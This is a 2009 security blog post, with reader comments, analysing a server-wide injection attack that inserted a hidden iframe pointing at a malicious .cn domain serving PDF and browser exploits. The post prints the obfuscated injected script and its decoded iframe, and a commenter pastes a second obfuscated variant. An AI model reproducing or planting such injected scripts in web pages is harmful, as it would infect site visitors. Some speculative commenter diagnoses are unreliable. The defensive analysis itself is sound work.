Unmask Parasites - Check your web pages for hidden links, iframes, malicious scripts, unauthorized redirects and other signs of security problems.
Loading site search ...

Ncccnnnc .cn – Warning: Not Opera Only

   15 Oct 09   Filed in Website exploits

This is just a quick post to let you know about a new type of server-wide script-injection attack I’ve just discovered.

I found this post on a phpBB forum and decided to check the infected site with Unmask Parasites. The tool reported a suspicious script:

ncccnnnc script in Unmask Parasites

I checked the HTML code of the page and found the following script there:

<span id="hTF"></span><s cript>/*Warning: Opera Only*/var jBn = document.createElement("script");jBn.text="document.wri te(unescape(\"%3c%69%66%72%616d%65%20%73%72%63%3d%27%68%74%74%70%3a%2f%2f%6e%63%63%63%6e%6e%6e%63%2e%63%6e%2f%69%6d%67%2f%69%6e%64%65%78%2e%70%68%70%27%20%73%74%79%6c%65%3d%27%64%69%73%70%6c%61%79%3a%6e%6f%6e%65%3b%27%3e%3c%2f%69%66%72%61%6d%65%3e\"));";document.getElementById("hTF").appendChild(jB n)</script>

Funny, it tries to make it look less suspicious adding this silly “Warning: Opera Only” comment. Browsers don’t read such comments and the code is executed in every browser.

When decoded and executed, this scripts injectes a hidden iframe

<i frame src='http://ncccnnnc .cn/img/index.php' style='display:none;'></iframe>

The iframe tries to load a malicious PDF file that only 4 out 41 anti-virus tools currently (Oct 15, 2009) detect as dangerous. Vulnerabilities in Adobe Acrobat is not the only way this iframe tries to infect site visitors. If a browser doesn’t have a PDF plugin, the malicious code tries another exploit (I didn’t have time to deofbuscate and check that branch of the code). So make sure all software (OS, browser, Flash, Adobe Acrobat, other plugins) on your computer are up-to-date.

The “ncccnnnc .cn” site was mentioned in the post as the source of the problem. It was a cross-site warning. It happens when a browser loads a web page and detects (in real time) that it contains elements from blacklisted sites. This feature works in Firefox 3.5+, Safari and Google Chrome.

When I found the malicious script, I decided to check how it worked. I tried to reload the page and noticed that it didn’t always appear at the same place. Sometimes it was in the middle of the HTML code, sometime at the very top (and the rest code of the page was missing).

It looked as if the malicious script was injected on the fly, and because of some bug, it corrupted the HTML code of web pages.

At this point I decided to check other sites on the same server. It was a shared server with 100+ domains belonging to different people from different countries, and every single site was affected. Even “404 page not found” error pages contained this script.

I checked Unmask Parasites logs and found two other servers infected by the same script-injection attack. I found the same “Opera Only” script on every site on those servers too.

Some of the checked sites had been blacklisted by Google for having that element from “ncccnnnc .cn” some time ago. But the warning had been already removed when I checked them. This means that a couple of days ago, Google scanned them and didn’t find the malicious code. This makes me think that either this attack is intermittent (works on certain days only. Today it works all the time) or the server admins tried to clean up the server but failed to close the security hole and the server has been reinfected very soon.

To webmasters:

If you find this script on your server, contact your server admin (or hosting provider) as soon as possible. This problem can be solved on a server-level only.

When you check your sites, make sure to disable external scripts in your web browser. Using NoScript is a good idea.

The fastest and safest way to check your site for this script is Unmask Parasites. Pay attention to highlighted items. In case of this specific hack, you’ll see a script that begins with “/*Warning: Opera Only*/var jBn = document.createElement(“script”)” in the “Suspicious Inline Scripts” section of the report.

To server admins:

If you find this hack on your server, please share any information about how it works and what vulnerability is exploited. You can leave a comment here or contact me directly (if you need to send me some files, I’ll get back to you and you’ll be able to email the files to me).

As alway, any comments are welcome.

Similar posts:

Reader's Comments (11)

  1. | ,, the hacker’s one of emails…

  2. |

    It seems that the freebie hosting service I was using and it appears everyone’s site on at least one server is infected. My question is…

    I had a .jpeg signature picture hosted at my infected server that was linked to for use as a signature file on other .php forums. Should visitors to that other forum that viewed that signature worry?

    ex:server A (infected server) xxxx.jpeg hosted on that server.

    Server B (not infected) – URL link in signature file to the xxxx.jpeg on Server A

    Are those that viewed the posts with the sig files, in danger?

    • |

      The 3 infected servers (that I know of) seem to have been recovered at the moment, so I can’t check it. But I think, the malicious code was only injected into html files (files with HTML markup). I guess visitors to Server B were not affected

  3. |

    […] This post was mentioned on Twitter by Denis, sarfraznawaz. sarfraznawaz said: Ncccnnnc .cn – #Warning: Not #Opera Only […]

  4. |

    This is a YES exploit kit. Control panel can be found at ncccnnnc. cn/img/admin/index.php

    It exists for about one week. All YES exploit kits query malwaredomainlist if its sites have already been listed on MDL.

    • |

      Thanks for the info.

      So it looks like ncccnnnc is not the only domain they use?

      Do you have any information about how this exloit works?

  5. |

    I have got this virus on my website, please send me an email about removal if possible. Thanks for the help!!!

  6. |

    I have figured it out! The virus infects your image files with a corrupted HTML file, which is parsed out in the page. Now, the infection is in the GD library, you need to completely reinstall!

  7. |

    My sites infected with similar code. It’s not in any of the files but it’s there when I open via browser. Can someone please suggest me how to solve this? The code is :

    var MouCn = document;MouCn.writeln(eRRhK());function NZNrq(HYDjw){ var hOWsD = “”, kTPQQ = 0;for (kTPQQ=HYDjw.length-1;kTPQQ>=0;kTPQQ–){hOWsD += HYDjw.charAt(kTPQQ);} return hOWsD;}function eRRhK(){document.write(“.mOnjv{width:0%;height:0%;border:none;}”);var uyofy = “”;var yxZmn = uyofy.replace(/[\+$]/g, hDtWy(“.″));return yxZmn;}function hDtWy(GszBw){GszBw = GszBw.replace(/[\.]/g, “%”);GszBw = unescape(GszBw);return NZNrq(GszBw);}

    • |


      This must be only a part of the code, since the only thing it does is creates a new “hidden” style and prints “http ://ncccnnnc .cn/img/ index.php

      Anyway, this must be the same server-wide exploits and you should contact your hosting provider.

      • |

        Thank you for your reply Denis.

        I made a test yesterday, uploaded a blank file, say test.html. When I opened it via browser all I can see is the code above (it supposed to be blank). This is just too weird for me. Can you please let me know how to solve this issue exactly? I have already contacted my hosting provider including a link to this blog two days ago but but the code is still there. Thanks a lot in advance!